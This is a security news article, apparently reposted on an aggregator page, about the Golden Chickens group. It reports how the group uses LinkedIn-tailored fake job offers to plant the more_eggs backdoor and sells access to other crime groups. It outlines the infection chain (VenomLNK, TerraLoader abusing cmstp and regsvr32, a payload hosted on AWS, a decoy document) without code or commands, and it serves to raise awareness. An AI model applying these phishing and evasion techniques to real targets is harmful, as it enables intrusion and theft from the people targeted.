Top cyber crime gangs use targeted fake job offers to deploy stealthy backdoor | #firefox | #firefoxsecurity

Credit: Dreamstime

A group of criminals behind a stealthy backdoor known as more_eggs is targeting professionals with fake job offers tailored to them based on information from their LinkedIn profiles.

The gang is selling access to systems infected with the backdoor to other sophisticated cyber crime groups including FIN6, Evilnum and Cobalt Group that are known to target organisations from various industries.

Spearfishing with LinkedIn info

In a recent attack detected by researchers from managed detection and response firm eSentire, the hackers targeted a professional working in the healthcare technology industry with a phishing email mimicking a job offer for a position identical to the one the target had listed on their LinkedIn profile page. This seems to be a technique that this group, known in the security industry as the Golden Chickens, has also used in the past.

The rogue emails contain a zip file that’s named after the job position the email offers. If opened, it starts a malicious component known as VenomLNK, which serves as the first stage in the more_eggs infection.

“Golden Chickens sell the backdoor under a malware-as-a-service (MaaS) arrangement to other cyber criminals,” the eSentire’s research team said in its report. “Once more_eggs is on the victim’s computer system, the Golden Eggs seedy customers can go in and infect the system with any type of malware: ransomware, credential stealers, banking malware, or simply use the backdoor as a foothold into the victim’s network so as to exfiltrate data.”

The infection chain

Once executed on a victim’s machine, VenomLNK uses Windows Management Instrumentation (WMI), a subsystem of PowerShell, to deploy that attack’s second stage: a malware loader known as TerraLoader.

TerraLoader hijacks two legitimate Windows processes, cmstp and regsvr32, to load the final payload called TerraPreter, which gets downloaded from servers hosted on Amazon AWS to evade possible network filters and gets deployed as an ActiveX control. ActiveX is a framework that allows code execution through Internet Explorer and is supported natively on Windows.

TerraLoader also drops and opens a Microsoft Word document that’s designed to look like a legitimate employment application. This is used only as a decoy so the user doesn’t become suspicious after opening the email attachment.

Original Source link

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Leave a Reply

Your email address will not be published. Required fields are marked *

2 + 6 =